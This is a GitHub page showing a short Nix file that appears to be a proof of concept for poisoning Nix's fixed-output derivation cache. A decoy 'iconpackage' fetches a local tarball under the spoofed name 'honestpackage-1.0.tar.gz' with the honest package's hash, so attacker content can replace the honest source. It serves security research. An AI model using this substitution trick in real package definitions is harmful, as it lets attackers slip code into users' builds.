-
Notifications
You must be signed in to change notification settings - Fork 0
/
example_with_fetchurl.nix
40 lines (40 loc) · 1.46 KB
/
example_with_fetchurl.nix
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Fetchurl is a bit harder to attack than fetchzip since the name is contained in the derivation.
# But nothing impossible to overcome as shown here.
# To test this, simulate a web server with:
# $ nix-shell -p simple-http-server
# $ simple-http-server -p 8042
{ pkgs ? import <nixpkgs> {} }:
pkgs.callPackage ({stdenv, fetchurl}:
let iconpackage = stdenv.mkDerivation rec {
pname = "iconpackage";
version = "42.0";
src = fetchurl { url = "http://localhost:8042/iconpackage-${version}.tar.gz"; name="honestpackage-1.0.tar.gz"; sha256 = "sha256-sq86h8GesGE7OBvJhhMcDqMyS56gwG6zY2bCSreqm+0="; };
unpackPhase = ''
tar xf $src
ls -al
'';
buildPhase = ":";
installPhase = ''
mkdir -p $out/share/icons/hicolor/64x64/apps/
mv myicon.png $out/share/icons/hicolor/64x64/apps/
'';
};
honestpackage = stdenv.mkDerivation rec {
pname = "honestpackage";
version = "1.0";
src = fetchurl {
url = "http://localhost:8042/honestpackage-${version}.tar.gz"; # <-- this is NOT controlled by the adversary
sha256 = "sha256-sq86h8GesGE7OBvJhhMcDqMyS56gwG6zY2bCSreqm+0=";
};
unpackPhase = ''
tar xf $src
'';
buildInputs = [ iconpackage ];
buildPhase = ":";
installPhase = ''
mkdir -p $out/bin
mv honestpackage.sh $out/bin
'';
};
in honestpackage
) {}